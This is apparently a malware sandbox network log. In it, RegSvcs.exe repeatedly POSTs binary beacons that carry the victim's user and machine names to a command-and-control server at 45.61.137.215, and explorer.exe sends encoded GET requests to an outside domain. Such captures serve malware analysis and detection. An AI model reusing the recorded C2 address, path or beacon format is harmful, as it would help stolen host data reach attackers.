May 29, 2024 15:44:28.196456909 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:28.196468115 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.9	49768	3.33.130.190	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:27.955456018 CEST	175	OUT	GET /dn03/?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1 Host: www.sukhiclothing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 29, 2024 15:44:28.418926954 CEST	351	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 29 May 2024 13:44:28 GMT Content-Type: text/html Content-Length: 211 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4b 76 4f 78 33 3d 7a 31 63 53 59 53 67 44 77 38 45 6f 76 78 57 44 62 45 6a 72 45 6a 6d 75 64 4b 69 4a 43 35 4f 62 51 47 42 66 46 68 53 57 36 4a 52 71 78 72 63 6f 77 48 4b 36 37 32 63 2f 50 4a 4f 51 52 45 6b 50 47 2b 55 4e 26 4c 68 45 78 3d 4f 44 4b 58 5a 44 56 70 59 32 77 38 67 70 6d 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.9	49769	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:28.419439077 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:28.424568892 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:30.887202024 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:28 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:30.887219906 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:44:30.887284994 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:44:30.887295008 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:44:30.887305021 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:44:30.887315989 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:44:30.887365103 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:30.887375116 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:30.887383938 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:30.887501955 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.9	49770	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:31.132504940 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:31.137581110 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:33.775016069 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:31 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:33.775177002 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:33.775190115 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:33.775213957 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:33.775219917 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:33.775229931 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:33.775234938 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:33.775239944 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:33.775244951 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:33.775252104 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.9	49771	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:33.942472935 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:33.947452068 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:36.461035967 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:36.461050034 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:36.461067915 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:36.461074114 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
